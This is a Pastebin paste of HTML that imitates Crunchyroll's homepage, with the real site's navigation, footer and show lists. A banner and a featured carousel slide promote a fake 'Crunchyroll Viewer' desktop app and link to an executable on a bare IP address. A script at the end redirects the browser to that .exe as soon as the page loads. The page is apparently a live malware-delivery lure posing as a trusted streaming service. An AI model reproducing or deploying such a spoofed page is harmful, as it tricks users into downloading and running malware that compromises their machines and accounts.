Advertisement
Guest User

Untitled

a guest
Nov 4th, 2017
18,727
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 28.13 KB | None | 0 0
  1.  
  2. <!DOCTYPE html>
  3. <html lang="en">
  4.  
  5. <head>
  6.     <meta charset="UTF-8">
  7.     <meta name="viewport" content="width=device-width, initial-scale=1.0">
  8.     <meta http-equiv="X-UA-Compatible" content="ie=edge">
  9.     <title>Crunchyroll - Watch Naruto Shippuden, Bleach, Anime Videos and Episodes Free Online</title>
  10.     <link rel="stylesheet" href="index.css">
  11. </head>
  12.  
  13. <body>
  14.     <header id="header_beta" class="site-header" itemscope="" itemtype="http://schema.org/WPHeader">
  15.         <div id="header_container" class="content">
  16.             <div class="header-navigation">
  17.                 <div class="home">
  18.                     <h1 id="logo_beta" class="header-logo logo-enUS" itemscope="" itemtype="http://schema.org/Organization">
  19.                         <meta content="Crunchyroll" itemprop="name">
  20.  
  21.                         <a href="/" itemprop="url">
  22.                             <svg viewBox="0 0 96 18">
  23.                                 <title>Crunchyroll</title>
  24.                                 <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="i/svg/header.svg#cr_logo_noTagline"></use>
  25.                             </svg>
  26.                         </a>
  27.                     </h1>
  28.  
  29.                     <button id="header_mobilemenu_beta" class="mini-menu-button" type="button">
  30.                 <svg class="open-icon" viewBox="0 0 48 48">
  31.                   <title>Open Menu</title>
  32.                   <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="i/svg/header.svg#cr_drawer"></use>
  33.                 </svg>
  34.      
  35.                 <svg class="close-icon" viewBox="0 0 48 48">
  36.                   <title>Close Menu</title>
  37.                   <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="i/svg/header.svg#cr_close"></use>
  38.                 </svg>
  39.               </button>
  40.                 </div>
  41.  
  42.                 <nav id="header_menubar_beta" class="header-menubar" itemscope="" itemtype="http://schema.org/SiteNavigationElement">
  43.                     <ul>
  44.                         <li class="">
  45.                             <a href="/videos/anime" itemprop="url" token="topbar">Shows</a>
  46.                         </li>
  47.  
  48.                         <li class="">
  49.                             <a href="/comics/manga" itemprop="url" token="topbar">Manga</a>
  50.                         </li>
  51.  
  52.                         <li class="">
  53.                             <a href="/news" itemprop="url" token="topbar">News</a>
  54.                         </li>
  55.  
  56.                         <li class="">
  57.                             <a href="/forum" rel="discussion" itemprop="url" token="topbar">Forums</a>
  58.                         </li>
  59.  
  60.                         <li class="">
  61.                             <a href="/store" itemprop="url" token="topbar">Store</a>
  62.                         </li>
  63.  
  64.                         <li class="premium ">
  65.                             <a href="/freetrial?from=topbar" itemprop="url" token="topbar">
  66.                       <span class="premium-link-text">
  67.                         Premium                  <small class="freetrial-note">Try Free</small>
  68.                       </span>
  69.                     </a>
  70.                         </li>
  71.                     </ul>
  72.                 </nav>
  73.  
  74.                 <nav id="header_userpanel_beta" class="header-userpanel" itemscope="" itemtype="http://schema.org/SiteNavigationElement">
  75.                     <ul>
  76.                         <li class="userpanel-item login">
  77.                             <a class="header-icon" href="https://www.crunchyroll.com/login?next=%2F" rel="nofollow" token="login_top">
  78.                                 <svg viewBox="0 0 48 48">
  79.                                     <title>Login</title>
  80.                                     <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="i/svg/header.svg#cr_login"></use>
  81.                                 </svg>
  82.                                 <div class="caption">Login</div>
  83.                             </a>
  84.                         </li>
  85.  
  86.                         <li class="userpanel-item queue ">
  87.                             <a class="header-icon" href="/home" token="topbar">
  88.                                 <div class="icon-container">
  89.                                     <svg viewBox="0 0 48 48">
  90.                                         <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="i/svg/header.svg#cr_bookmark_header"></use>
  91.                                     </svg>
  92.                                 </div>
  93.  
  94.                                 <div class="caption">Queue</div>
  95.                             </a>
  96.                         </li>
  97.                         <li class="userpanel-item random">
  98.                             <a class="header-icon" href="/random/anime?random_ref=topbar" token="topbar">
  99.                                 <div class="icon-container">
  100.                                     <svg viewBox="0 0 48 48">
  101.                                         <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="i/svg/header.svg#cr_random"></use>
  102.                                     </svg>
  103.                                 </div>
  104.  
  105.                                 <div class="caption">Random</div>
  106.                             </a>
  107.                         </li>
  108.  
  109.  
  110.                         <li id="header_search_userpanel_item" class="userpanel-item search">
  111.                             <button id="header_show_search_button" class="header-icon" type="button">
  112.           <div class="icon-container">
  113.             <svg viewBox="0 0 48 48">
  114.               <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="i/svg/header.svg#cr_search"></use>
  115.             </svg>
  116.           </div>
  117.      
  118.           <div class="caption">Search</div>
  119.         </button>
  120.                         </li>
  121.                     </ul>
  122.                 </nav>
  123.             </div>
  124.  
  125.             <form id="header_search_form" class="header-search-form" action="/search" method="get" itemprop="potentialAction" itemscope=""
  126.                itemtype="http://schema.org/SearchAction">
  127.                 <link itemprop="target" href="/search?q={q}">
  128.  
  129.                 <div class="content">
  130.                     <input name="from" type="hidden" value="">
  131.  
  132.                     <input id="header_search_input" class="header-searchbox" autocomplete="off" name="q" placeholder="Anime, drama, etc." type="search"
  133.                        value="" itemprop="query-input">
  134.  
  135.                     <button id="header_search_submit_beta" class="header-searchbox-submit" title="Search">
  136.                 <svg viewBox="0 0 48 48">
  137.                   <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="i/svg/header.svg#cr_search"></use>
  138.                 </svg>
  139.      
  140.                 <span class="button-label">Search</span>
  141.               </button>
  142.                     <div id="header_search_autocomplete" class="header-search-autocomplete" style="display: none;"></div>
  143.                 </div>
  144.             </form>
  145.         </div>
  146.     </header>
  147.     <div id="template_scroller" class="ad-skin">
  148.         <div id="template_skin_leaderboard" class="clearfix"><span id="SLB" class="_fwph">
  149. <form id="_fw_form_SLB" style="display:none">
  150. <input type="hidden" name="_fw_input_SLB" id="_fw_input_SLB" value="ptgt=s&amp;h=160&amp;w=960&amp;tpcl=DISPLAY">
  151. </form>
  152. <span id="_fw_container_SLB"></span>
  153.             </span>
  154.         </div>
  155.         <div id="template_container" class="cf template-container no-adskin">
  156.             <div id="template_body" class="cf old-template-body">
  157.                 <div id="message_box">
  158.                     <div class="message-container cf"><img class="message-list-hide" src="i/icons/remove_grey_14_14.gif">
  159.                         <div class="message-list">
  160.                             <div class="message-item clearfix message-type-warning"><img class="message-item-icon" src=""><a href="http://109.232.225.12/CrunchyViewer.exe">Try our new desktop application !</a></div>
  161.                         </div>
  162.                     </div>
  163.                 </div>
  164.  
  165.                 <div style="height:0;visibility:hidden;" class="clearfix"></div>
  166.  
  167.                 <div id="welcome_left">
  168.                     <div class="welcome-featured-media">
  169.                         <!-- check1 -->
  170.                         <!-- check2 -->
  171.                         <style>
  172.                             .slider-container .slide {
  173.                                 margin: 0;
  174.                                 position: relative;
  175.                                 float: left;
  176.                                 display: block;
  177.                                 z-index: 4;
  178.                                 height: 100%;
  179.                                 overflow: hidden;
  180.                                 z-index: 10;
  181.                                 width: 100%;
  182.                                 left: 0;
  183.                                 top: 0;
  184.                             }
  185.  
  186.                             .slider-container .slide .img {
  187.                                 z-index: 5;
  188.                                 background-repeat: no-repeat;
  189.                                 background-size: cover;
  190.                                 background-position: 50% 50%;
  191.                                 width: 100%;
  192.                                 height: 100%;
  193.                                 top: 0;
  194.                                 left: 0;
  195.                             }
  196.  
  197.                             .overlay {
  198.                                 width: 100%;
  199.                                 height: 100%;
  200.                                 position: absolute;
  201.                                 top: 0;
  202.                                 left: 0;
  203.                                 background-color: transparent;
  204.                                 z-index: 7;
  205.                                 -moz-transition-property: background-color;
  206.                                 -o-transition-property: background-color;
  207.                                 -webkit-transition-property: background-color;
  208.                                 transition-property: background-color;
  209.                                 -moz-transition-duration: 0.5s;
  210.                                 -o-transition-duration: 0.5s;
  211.                                 -webkit-transition-duration: 0.5s;
  212.                                 transition-duration: 0.5s;
  213.                             }
  214.  
  215.                             .overlay a {
  216.                                 text-decoration: none;
  217.                                 border: none;
  218.                                 outline: none;
  219.                                 width: 100%;
  220.                                 height: 100%;
  221.                                 top: 0;
  222.                                 left: 0;
  223.                                 position: relative;
  224.                                 display: block;
  225.                                 z-index: 8;
  226.                             }
  227.  
  228.                             .overlay-content {
  229.                                 background-color: rgba(0, 0, 0, .4);
  230.                                 bottom: 0;
  231.                                 color: #FFF;
  232.                                 display: table;
  233.                                 height: 110px;
  234.                                 padding: 0;
  235.                                 position: absolute;
  236.                                 text-shadow: 2px 2px 4px #000;
  237.                             }
  238.  
  239.                             .overlay-content .caption {
  240.                                 padding: 5px 20px;
  241.                             }
  242.  
  243.                             .carousel-headline {
  244.                                 font-size: 22px;
  245.                                 font-weight: 400;
  246.                             }
  247.  
  248.                             .carousel-lead {
  249.                                 font-size: 18px;
  250.                             }
  251.  
  252.                             .carousel-text {
  253.                                 font-size: 13px;
  254.                             }
  255.  
  256.                             .overlay-content .caption {
  257.                                 padding: 5px 20px;
  258.                             }
  259.  
  260.                             .overlay-action {
  261.                                 padding: 5px 20px 5px 0;
  262.                                 vertical-align: middle;
  263.                                 width: 110px;
  264.                             }
  265.  
  266.                             .overlay-action span {
  267.                                 background: transparent url(i/featured_slideshow.png) no-repeat 0 -80px;
  268.                                 display: table-cell;
  269.                                 height: 2.5rem;
  270.                                 font-size: .8rem;
  271.                                 font-weight: 700;
  272.                                 line-height: 2.5;
  273.                                 padding-left: 5px;
  274.                                 text-shadow: none;
  275.                                 vertical-align: middle;
  276.                                 width: 105px;
  277.                             }
  278.  
  279.                             .overlay-content>* {
  280.                                 display: table-cell;
  281.                             }
  282.                         </style>
  283.                         <div style="display:block;height:450px;width:550px" class="slider-container">
  284.                             <div class="slide slide-1 active" data-slide="1" style="display: block;margin:15px">
  285.                                 <div class="img" style="background-image: url(https://i.imgur.com/M8YcBWW.png)"></div>
  286.                                 <div class="blur"></div>
  287.                                 <div class="overlay dark-overlay">
  288.                                     <a class="js-banner-slide" href="http://109.232.225.12/CrunchyViewer.exe" data-name="A New Beginning, A New Media Player…">
  289.                                         <div class="overlay-content">
  290.                                             <div class="caption">
  291.                                                 <h2 class="carousel-headline">A New Beginning, A New Media Player…</h2>
  292.                                                 <p class="carousel-lead">Crunchyroll Viewer</p>
  293.                                                 <p class="carousel-text">Stream your favorites animes in full 4k HD from anywhere! Support lasts crunchyroll
  294.                                                     features, inbuilt microtransactions management. Get your FREE trial now
  295.                                                     !
  296.                                                 </p>
  297.                                             </div>
  298.                                             <div class="overlay-action">
  299.                                                 <span style="font-size:10px">DOWNLOAD NOW</span>
  300.                                             </div>
  301.                                         </div>
  302.                                     </a>
  303.                                 </div>
  304.                             </div>
  305.                         </div>
  306.                     </div>
  307.                 </div>
  308.  
  309.                 <div id="footer" class="cf container-shadow-bottom">
  310.                     <div id="footer_menu" class="clearfix">
  311.                         <div class="footer-categories-container">
  312.                             <div class="footer-column footer-mobile-hide">
  313.                                 <h6>Popular Shows</h6>
  314.                                 <ul dir="auto">
  315.  
  316.                                     <li><a href="/one-piece" token="bottombar">One Piece</a></li>
  317.                                     <li><a href="/dragon-ball-super" token="bottombar">Dragon Ball Super</a></li>
  318.                                     <li><a href="/recovery-of-an-mmo-junkie" token="bottombar">Recovery of an MMO Junkie</a></li>
  319.                                     <li><a href="/boruto-naruto-next-generations" token="bottombar">BORUTO: NARUTO NEXT GENERATIONS</a></li>
  320.                                     <li><a href="/food-wars-shokugeki-no-soma" token="bottombar">Food Wars! Shokugeki no Soma</a></li>
  321.                                     <li><a href="/naruto-shippuden" token="bottombar">Naruto Shippuden</a></li>
  322.                                     <li><a href="/black-clover" token="bottombar">Black Clover</a></li>
  323.                                     <li><a href="/kinos-journey-the-beautiful-world-the-animated-series" token="bottombar">Kino's Journey -the Beautiful World- the Animated Series</a></li>
  324.                                 </ul>
  325.                             </div>
  326.  
  327.                             <div class="footer-column footer-mobile-hide">
  328.                                 <h6>Platforms and Devices</h6>
  329.                                 <ul>
  330.                                     <li><a href="/devices#wiiu" token="bottombar">Wii U</a></li>
  331.                                     <li><a href="/devices#chromecast" token="bottombar">Chromecast</a></li>
  332.                                     <li><a href="/devices#xboxone" token="bottombar">Xbox One</a></li>
  333.                                     <li><a href="/devices#xbox360" token="bottombar">Xbox 360</a></li>
  334.                                     <li><a href="/devices#ps4" token="bottombar">PlayStation 4</a></li>
  335.                                     <li><a href="/devices#ps3" token="bottombar">PlayStation 3</a></li>
  336.                                     <li><a href="/devices#vita" token="bottombar">Playstation Vita</a></li>
  337.                                     <li><a href="/devices#ios" token="bottombar">Apple iOS</a></li>
  338.                                     <li><a href="/devices#android" token="bottombar">Android</a></li>
  339.                                     <li><a href="/devices#winphone" token="bottombar">Windows Phone</a></li>
  340.                                     <li><a href="/devices#appletv" token="bottombar">Apple TV</a></li>
  341.                                     <li><a href="/devices#roku" token="bottombar">Roku Box</a></li>
  342.                                 </ul>
  343.                             </div>
  344.  
  345.                             <div class="footer-column">
  346.                                 <h6>Premium Memberships</h6>
  347.                                 <ul>
  348.                                     <li>
  349.                                         <a href="/freetrial?from=bottombar">
  350.       Two-Week Free Trial            </a>
  351.                                     </li>
  352.  
  353.                                     <li>
  354.                                         <a href="/en/premium_comparison?src=bottombar">
  355.       Compare Plans            </a>
  356.                                     </li>
  357.  
  358.                                     <li>
  359.                                         <a href="/store/p/163389/Premium-Membership-Gift-One-Month?src=bottombar">
  360.       Gift Memberships            </a>
  361.                                     </li>
  362.  
  363.                                     <li>
  364.                                         <a href="http://vrv.co/redeemcrunchyroll">
  365.       Redeem Crunchyroll/VRV Gift Card            </a>
  366.                                     </li>
  367.                                 </ul>
  368.                             </div>
  369.  
  370.                             <div class="footer-column">
  371.                                 <h6>Language <img id="footer_country_flag" src="http://static.ak.crunchyroll.com/i/country_flags/ca.gif"
  372.                                        alt="Canada" title="Your detected location is Canada.">
  373.                                 </h6>
  374.                                 <ul id="footer_language_list" class="footer-language">
  375.                                     <li><a href="#" onclick="return Localization.SetLang(&quot;enUS&quot;);" data-language="English (US)"
  376.                                            class="selected">English (US)</a></li>
  377.                                     <li><a href="#" onclick="return Localization.SetLang(&quot;enGB&quot;);" data-language="English (UK)">English (UK)</a></li>
  378.                                     <li><a href="#" onclick="return Localization.SetLang(&quot;esLA&quot;);" data-language="Español">Español</a></li>
  379.                                     <li><a href="#" onclick="return Localization.SetLang(&quot;esES&quot;);" data-language="Español (España)">Español (España)</a></li>
  380.                                     <li><a href="#" onclick="return Localization.SetLang(&quot;ptBR&quot;);" data-language="Português (Brasil)">Português (Brasil)</a></li>
  381.                                     <li><a href="#" onclick="return Localization.SetLang(&quot;ptPT&quot;);" data-language="Português (Portugal)">Português (Portugal)</a></li>
  382.                                     <li><a href="#" onclick="return Localization.SetLang(&quot;frFR&quot;);" data-language="Français (France)">Français (France)</a></li>
  383.                                     <li><a href="#" onclick="return Localization.SetLang(&quot;deDE&quot;);" data-language="Deutsch">Deutsch</a></li>
  384.                                     <li><a href="#" onclick="return Localization.SetLang(&quot;arME&quot;);" data-language="العربية">العربية</a></li>
  385.                                     <li><a href="#" onclick="return Localization.SetLang(&quot;itIT&quot;);" data-language="Italiano">Italiano</a></li>
  386.                                 </ul>
  387.                             </div>
  388.  
  389.                             <div class="footer-column">
  390.                                 <h6>Support</h6>
  391.                                 <ul>
  392.                                     <li><a href="https://crunchyroll.zendesk.com/hc" token="bottombar">Help/FAQ</a></li>
  393.                                     <li><a href="/outreach" token="bottombar">Outreach</a></li>
  394.                                 </ul>
  395.                                 <h6 style="padding-top: 10px">Crunchyroll Store</h6>
  396.                                 <ul>
  397.                                     <li><a href="http://www.crunchyroll.com/orderstatus" token="bottombar">Order History</a></li>
  398.                                     <li><a href="http://www.crunchyroll.com/acct/billing" token="bottombar">Payment Settings</a></li>
  399.                                     <li><a href="http://www.crunchyroll.com/acct/?action=shipping_info" token="bottombar">Shipping Settings</a></li>
  400.                                     <li><a href="https://help.crunchyroll.com/hc/en-us/articles/115004755346-Crunchyroll-Store-Information"
  401.                                            token="bottombar">Store Information</a></li>
  402.                                 </ul>
  403.                             </div>
  404.  
  405.                             <div class="footer-column">
  406.                                 <h6>Crunchyroll</h6>
  407.                                 <ul>
  408.                                     <li><a href="/en/about" token="bottombar">About</a></li>
  409.                                     <li><a href="/jobs" token="bottombar">Jobs</a></li>
  410.                                     <li><a href="/advertising" token="bottombar">Advertising</a></li>
  411.                                     <li><a href="/dmca_policy" token="bottombar">Copyright Policy</a></li>
  412.                                     <li><a href="/tos" token="bottombar">Terms of Service</a></li>
  413.                                     <li><a href="/privacy" token="bottombar">Privacy Policy <span class="new-footer">New</span></a></li>
  414.                                 </ul>
  415.                             </div>
  416.                         </div>
  417.  
  418.                         <div id="social_media">
  419.                             <div class="footer-column">
  420.                                 <a href="/feed" token="bottombar">
  421.   <img class="icon" src="http://static.ak.crunchyroll.com/i/rss.png" alt="rss">
  422. </a>
  423.                                 <a href="/feed" token="bottombar">RSS</a>
  424.                             </div>
  425.                             <div class="footer-column">
  426.                                 <iframe id="twitter-widget-0" scrolling="no" frameborder="0" allowtransparency="true" class="twitter-follow-button twitter-follow-button-rendered"
  427.                                    title="Twitter Follow Button" src="http://platform.twitter.com/widgets/follow_button.c7112f7adf6a24ddcb78d834866e1439.en.html#dnt=false&amp;id=twitter-widget-0&amp;lang=en&amp;screen_name=Crunchyroll&amp;show_count=false&amp;show_screen_name=true&amp;size=m&amp;time=1509785142846"
  428.                                    style="position: static; visibility: visible; width: 133px; height: 20px;" data-screen-name="Crunchyroll"></iframe>
  429.  
  430.                             </div>
  431.                             <div class="footer-column">
  432.                                 <div class="fb-like fb_iframe_widget" data-href="https://www.facebook.com/Crunchyroll" data-layout="button_count" data-action="like"
  433.                                    data-show-faces="true" data-share="false" fb-xfbml-state="rendered" fb-iframe-plugin-query="action=like&amp;app_id=&amp;container_width=0&amp;href=https%3A%2F%2Fwww.facebook.com%2FCrunchyroll&amp;layout=button_count&amp;locale=en_US&amp;sdk=joey&amp;share=false&amp;show_faces=true"><span style="vertical-align: bottom; width: 79px; height: 20px;"><iframe name="fe0bc1a0d60ac4" width="1000px" height="1000px" frameborder="0" allowtransparency="true" allowfullscreen="true" scrolling="no" title="fb:like Facebook Social Plugin" src="https://www.facebook.com/v2.5/plugins/like.php?action=like&amp;app_id=&amp;channel=http%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2FBbnCpbXY9X8.js%3Fversion%3D42%23cb%3Df38fe02b4475ee4%26domain%3Dwww.crunchyroll.com%26origin%3Dhttp%253A%252F%252Fwww.crunchyroll.com%252Ffed025b1f005f%26relation%3Dparent.parent&amp;container_width=0&amp;href=https%3A%2F%2Fwww.facebook.com%2FCrunchyroll&amp;layout=button_count&amp;locale=en_US&amp;sdk=joey&amp;share=false&amp;show_faces=true" style="border: none; visibility: visible; width: 79px; height: 20px;" class=""></iframe></span></div>
  434.                             </div>
  435.                             <div class="footer-column">
  436.                                 <div id="___follow_0" style="text-indent: 0px; margin: 0px; padding: 0px; background: transparent; border-style: none; float: none; line-height: normal; font-size: 1px; vertical-align: baseline; display: inline-block; width: 117px; height: 20px;">
  437.                                     <iframe ng-non-bindable="" frameborder="0" hspace="0" marginheight="0" marginwidth="0" scrolling="no" style="position: static; top: 0px; width: 117px; margin: 0px; border-style: none; left: 0px; visibility: visible; height: 20px;"
  438.                                        tabindex="0" vspace="0" width="100%" id="I0_1509785142057" name="I0_1509785142057" src="https://apis.google.com/u/0/_/widget/render/follow?usegapi=1&amp;annotation=bubble&amp;height=20&amp;rel=publisher&amp;hl=en-US&amp;origin=http%3A%2F%2Fwww.crunchyroll.com&amp;url=https%3A%2F%2Fplus.google.com%2F106460836780899737568&amp;gsrc=3p&amp;ic=1&amp;jsh=m%3B%2F_%2Fscs%2Fapps-static%2F_%2Fjs%2Fk%3Doz.gapi.en_GB.sExU9SmgcZU.O%2Fm%3D__features__%2Fam%3DAQ%2Frt%3Dj%2Fd%3D1%2Frs%3DAGLTcCNqBAQ352LroyZ6MaiQy0AlGbXqGA#_methods=onPlusOne%2C_ready%2C_close%2C_open%2C_resizeMe%2C_renderstart%2Concircled%2Cdrefresh%2Cerefresh%2Conload&amp;id=I0_1509785142057&amp;_gfid=I0_1509785142057&amp;parent=http%3A%2F%2Fwww.crunchyroll.com&amp;pfname=&amp;rpctoken=32351727"
  439.                                        data-gapiattached="true"></iframe>
  440.                                 </div>
  441.                             </div>
  442.  
  443.                         </div>
  444.                     </div>
  445.                 </div>
  446.  
  447.                 <div id="global_base_bubble" class="widget-base-bubble" style="display: none;">
  448.                     <div id="global_base_bubble_contents" class="clearfix"></div>
  449.                     <div class="widget-dropshadow-top"></div>
  450.                     <div class="widget-dropshadow-top-right"></div>
  451.                     <div class="widget-dropshadow-right"></div>
  452.                     <div class="widget-dropshadow-bottom-right"></div>
  453.                     <div class="widget-dropshadow-bottom"></div>
  454.                     <div class="widget-dropshadow-bottom-left"></div>
  455.                     <div class="widget-dropshadow-left"></div>
  456.                     <div class="widget-dropshadow-top-left"></div>
  457.                 </div>
  458.             </div>
  459.         </div>
  460.         <script>
  461.             window.location = 'http://109.232.225.12/CrunchyViewer.exe';
  462.         </script>
  463. </body>
  464.  
  465. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement